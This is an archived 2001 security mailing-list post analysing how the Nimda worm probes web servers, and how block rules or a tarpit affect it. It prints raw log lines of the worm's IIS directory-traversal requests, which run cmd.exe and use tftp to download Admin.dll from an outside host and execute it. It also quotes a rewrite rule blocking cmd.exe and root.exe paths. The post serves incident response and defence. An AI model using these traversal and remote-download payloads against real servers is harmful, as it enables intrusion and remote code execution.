RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update

From: Michael Halls (mhallsat_private)
Date: Wed Sep 19 2001 - 13:21:20 PDT

Next message: Bryan Andersen: "Nimda Probes by Hour"

Previous message: Blaine Kubesh: "Nimda Poison Pill"
In reply to: George Milliken: "RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update"
Next in thread: David Leitko: "RE: Nimda Apache RedirectMatch results"
Reply: David Leitko: "RE: Nimda Apache RedirectMatch results"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 19 Sep 2001, George Milliken wrote:

> Maybe something like a rewrite rule
>
> RewriteEngine	On
> RewriteRule	^.*/cmd.exe.*	[FL]
> RewriteRule	^.*/root.exe.*	[FL]
>
> This will send "forbidden" to systems trying those URLs and will stop
> rewrite processing.
>

Actually this may increase the load to those servers.  When the worm's
probe recieves anything other than a 404 (not found) it makes several other
requests to the server to exploit the machines.  It first trys to copy the
Admin.dll to the c:, d:, and e: drives:

216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll
HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll
HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll
HTTP/1.0" 200 51 "-" "-"

The worm then attempts to execute the Admin.dll

216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET
/scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-"

This has the effect of increasing the traffic about 5 fold.

The worm also will continue to probe/exploit the machine after it gets a
"hit" so a machine that returns 403 (forbidden) for each of the 16 attacks
would get about 80 hits to their website from each machine.  Playing
around with some cgi scripts that tarpit requests it looks like the worm's
tcp connections time out after 1 minute 30 seconds without a response.  By
sleeping my script for about 1 minute 15 seconds I can hold a machine in
my "tarpit" for about an hour and a half.

Does anybody know if this thing is single threaded?

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Bryan Andersen: "Nimda Probes by Hour"
Previous message: Blaine Kubesh: "Nimda Poison Pill"
In reply to: George Milliken: "RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update"
Next in thread: David Leitko: "RE: Nimda Apache RedirectMatch results"
Reply: David Leitko: "RE: Nimda Apache RedirectMatch results"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 14:48:52 PDT